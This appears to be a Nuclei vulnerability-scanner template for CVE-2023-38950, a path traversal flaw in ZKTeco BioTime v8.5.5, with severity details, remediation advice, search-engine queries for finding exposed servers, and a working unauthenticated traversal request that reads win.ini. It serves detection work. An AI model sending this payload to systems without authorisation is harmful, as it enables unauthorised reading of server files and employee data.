id: CVE-2023-38950 info: name: ZKTeco BioTime v8.5.5 - Path Traversal author: iamnoooob,pdresearch severity: high description: | A path traversal vulnerability in the iclock API of ZKTeco BioTime v8.5.5 allows unauthenticated attackers to read arbitrary files via supplying a crafted payload. impact: | Unauthenticated attackers can read arbitrary files from the server through path traversal in the iclock API url parameter, potentially exposing employee biometric data, attendance records, and system credentials. remediation: | Update ZKTeco BioTime to a version newer than 8.5.5 that validates file paths in the iclock API and restricts access to authorized files only. reference: - https://github.com/advisories/GHSA-4m8x-4g54-h49v - http://zkteco.com - https://claroty.com/team82/disclosure-dashboard/cve-2023-38950 - https://www.fortinet.com/content/dam/fortinet/assets/reports/report-incident-response-middle-east.pdf - https://nvd.nist.gov/vuln/detail/CVE-2023-38950 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-38950 cwe-id: CWE-22 epss-score: 0.834 epss-percentile: 0.99292 cpe: cpe:2.3:a:zkteco:biotime:8.5.5:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: zkteco product: biotime shodan-query: http.title:"biotime" fofa-query: title="biotime" google-query: intitle:"biotime" tags: cve,cve2023,zkteco,biotime,lfr,kev,vkev,vuln http: - raw: - | GET /iclock/file?url=/../../../../../../../../../windows/win.ini HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(header, "text/plain")' - 'contains_all(base64_decode(body), "; for 16-bit app support" ,"[extensions]")' condition: and # digest: 4a0a0047304502206bfb20823a66a786dea468fae6e9927e104b5a1adfdeb24a6369c9199553e0ad022100a3294966809298665d10c9877a8fcb36a020abbed02eb62020da1f42072e4cf4:922c64590222798bb761d5b6d8e72950